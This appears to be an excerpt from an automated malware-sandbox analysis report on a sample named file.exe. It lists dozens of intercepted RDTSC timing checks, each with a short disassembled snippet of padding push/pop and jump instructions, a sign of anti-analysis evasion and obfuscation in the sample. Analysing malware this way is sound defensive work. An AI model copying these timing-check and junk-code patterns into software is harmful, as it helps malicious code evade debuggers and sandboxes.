                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7213D second address: D7216C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1674F90E28h 0x00000009 popad 0x0000000a push eax 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jnp 00007F1674F90E24h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7216C second address: D72170 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D71515 second address: D71519 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D71519 second address: D71537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1675279DB8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D71537 second address: D7154D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F1674F90E16h 0x00000009 jmp 00007F1674F90E1Bh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7154D second address: D71555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D71555 second address: D7155B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D71828 second address: D7183B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 jc 00007F1675279DA6h 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D76A3B second address: D76A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D76A41 second address: D76A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D76A45 second address: D76A6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop ecx 0x0000000c popad 0x0000000d pushad 0x0000000e ja 00007F1674F90E23h 0x00000014 jmp 00007F1674F90E1Dh 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D76BD4 second address: D76BD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D76BD9 second address: D76BF2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 jmp 00007F1674F90E1Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D76D49 second address: D76D5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007F1675279DA6h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F1675279DA6h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D76D5F second address: D76D63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D76D63 second address: D76D7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F1675279DACh 0x00000012 jo 00007F1675279DA6h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D76D7B second address: D76D80 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D76D80 second address: D76D94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F1675279DA6h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c ja 00007F1675279DA6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D26DC5 second address: D26E4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F1674F90E18h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 adc edx, 27F37600h 0x0000002c mov edx, dword ptr [ebp+122D3200h] 0x00000032 mov edi, 4AE75881h 0x00000037 mov ebx, dword ptr [ebp+12487FDFh] 0x0000003d mov dl, ah 0x0000003f add eax, ebx 0x00000041 push esi 0x00000042 cld 0x00000043 pop ecx 0x00000044 movsx ecx, si 0x00000047 nop 0x00000048 jne 00007F1674F90E2Eh 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 jnl 00007F1674F90E25h 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D26E4F second address: D26ECE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnc 00007F1675279DA6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F1675279DA8h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 clc 0x0000002a push 00000004h 0x0000002c push 00000000h 0x0000002e push ebp 0x0000002f call 00007F1675279DA8h 0x00000034 pop ebp 0x00000035 mov dword ptr [esp+04h], ebp 0x00000039 add dword ptr [esp+04h], 00000019h 0x00000041 inc ebp 0x00000042 push ebp 0x00000043 ret 0x00000044 pop ebp 0x00000045 ret 0x00000046 call 00007F1675279DAEh 0x0000004b pop edx 0x0000004c mov cx, di 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007F1675279DB7h 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D26ECE second address: D26ED9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F1674F90E16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D77A4E second address: D77A5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1675279DAAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7D35D second address: D7D36D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F1674F90E16h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7D36D second address: D7D371 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7D371 second address: D7D38D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1674F90E26h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7D92A second address: D7D934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F1675279DA6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7D934 second address: D7D93F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7DEF5 second address: D7DEFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7DEFD second address: D7DF03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7DF03 second address: D7DF0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7DF0A second address: D7DF11 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7DF11 second address: D7DF22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a jbe 00007F1675279DA6h 0x00000010 pop edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7E575 second address: D7E57C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7E57C second address: D7E59F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007F1675279DA6h 0x0000000d jmp 00007F1675279DB6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7E59F second address: D7E5A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D84CA6 second address: D84CB6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 pop eax 0x00000009 jng 00007F1675279DA6h 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D84CB6 second address: D84CBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D84CBC second address: D84CC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D84CC2 second address: D84CC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D84CC6 second address: D84CE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1675279DB4h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD8444 second address: CD844C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD844C second address: CD8454 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D87E8B second address: D87E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F1674F90E16h 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D87E96 second address: D87E9B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D87E9B second address: D87EAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F1674F90E16h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D88007 second address: D8800D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D88152 second address: D88156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D88156 second address: D8815A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8815A second address: D8816D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1674F90E1Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8816D second address: D88173 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D88173 second address: D88177 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D882CB second address: D882CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D882CF second address: D882F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1674F90E25h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007F1674F90E16h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8849F second address: D884C3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F1675279DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jmp 00007F1675279DB6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D884C3 second address: D884C9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D88623 second address: D8862E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F1675279DA6h 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8862E second address: D88633 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D88633 second address: D88639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D88639 second address: D8863F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8863F second address: D8864B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8864B second address: D88664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F1674F90E16h 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f push edi 0x00000010 jno 00007F1674F90E16h 0x00000016 push esi 0x00000017 pop esi 0x00000018 pop edi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D88664 second address: D88674 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1675279DACh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9199D second address: D919A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D919A3 second address: D919A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D919A9 second address: D919B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9204D second address: D9207E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1675279DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F1675279DB2h 0x00000010 pop eax 0x00000011 jno 00007F1675279DA8h 0x00000017 popad 0x00000018 jp 00007F1675279DC8h 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9207E second address: D92082 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D92082 second address: D9208C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9208C second address: D92090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D92090 second address: D92094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D921B2 second address: D921B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D921B8 second address: D921D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1675279DB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D925E5 second address: D925F7 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1674F90E1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D925F7 second address: D9262E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1675279DAEh 0x00000007 jo 00007F1675279DA6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push edx 0x00000016 pop edx 0x00000017 jmp 00007F1675279DADh 0x0000001c popad 0x0000001d pushad 0x0000001e jbe 00007F1675279DA6h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9262E second address: D92645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F1674F90E1Ch 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D92645 second address: D9264B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9264B second address: D9265A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007F1674F90E16h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D92E82 second address: D92ECC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1675279DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F1675279DB1h 0x00000010 push eax 0x00000011 pop eax 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edi 0x00000016 pushad 0x00000017 pushad 0x00000018 jo 00007F1675279DA6h 0x0000001e jmp 00007F1675279DB1h 0x00000023 jmp 00007F1675279DADh 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D914CC second address: D914D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D914D0 second address: D914D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D914D6 second address: D914DB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D96CBC second address: D96CC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9DC37 second address: D9DC3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9DC3B second address: D9DC3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9DC3F second address: D9DC72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1674F90E23h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1674F90E22h 0x00000012 jg 00007F1674F90E16h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9DC72 second address: D9DC7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9DC7D second address: D9DC8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F1674F90E16h 0x0000000a pushad 0x0000000b popad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA8245 second address: DA8263 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1675279DB4h 0x00000009 jne 00007F1675279DA6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DACA34 second address: DACA39 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DACA39 second address: DACA3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAF53D second address: DAF556 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAF556 second address: DAF56D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1675279DB1h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAEF5C second address: DAEF9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1674F90E22h 0x00000009 popad 0x0000000a jmp 00007F1674F90E26h 0x0000000f jmp 00007F1674F90E20h 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB15A6 second address: DB15AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB15AC second address: DB15B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB118E second address: DB11AE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1675279DB9h 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
